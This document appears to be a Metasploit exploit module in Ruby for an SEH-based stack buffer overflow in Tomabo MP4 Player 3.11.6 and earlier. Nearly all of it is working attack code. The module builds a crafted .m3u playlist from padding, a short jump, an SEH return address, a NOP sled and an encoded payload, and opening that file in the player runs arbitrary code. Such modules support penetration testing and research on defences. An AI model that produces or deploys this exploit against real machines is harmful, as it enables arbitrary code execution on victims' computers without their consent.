Tomabo M3U SEH Based Stack Buffer Overflow

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::FILEFORMAT  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Tomabo M3U SEH Based Stack Buffer Overflow',  
'Description' => %q{  
This module exploits a stack over flow in Tomabo MP4 Player <= 3.11.6. When  
the application is used to open a specially crafted m3u file, an buffer is overwritten allowing  
for the execution of arbitrary code.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'yokoacc', # Proof of concept  
'nudragn', # Proof of concept  
'rungga_reksya', # Proof of concept  
'rahmat_nurfauzi' # Metasploit module  
],  
'References' =>  
[  
[ 'EDB', '38486' ],  
[ 'URL', 'http://www.tomabo.com/mp4-player/download.html'],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'seh',  
'StackAdjustment' => -3500,  
'DisableNops' => 'True',   
},  
'Payload' =>  
{  
'Space' => 1800,  
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x1a\x20"  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Tomabo MP4 Player <= 3.11.6', { 'Ret' => 0x00401CA9 } ],  
],  
'Privileged' => false,  
'DisclosureDate' => 'Oct 18 2015',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),  
], self.class)  
end  
  
def exploit  
sploit = rand_text_alpha_upper(1028)  
sploit << "\xeb\x08\x90\x90" # short jump 8 bytes  
sploit << [target.ret].pack('V') # universal  
sploit << "\x90" * 16  
sploit << payload.encoded  
sploit << "\x44" * 436  
  
playlist = sploit  
print_status("Creating '#{datastore['FILENAME']}' file ...")  
  
file_create(playlist)  
end   
end  
  
`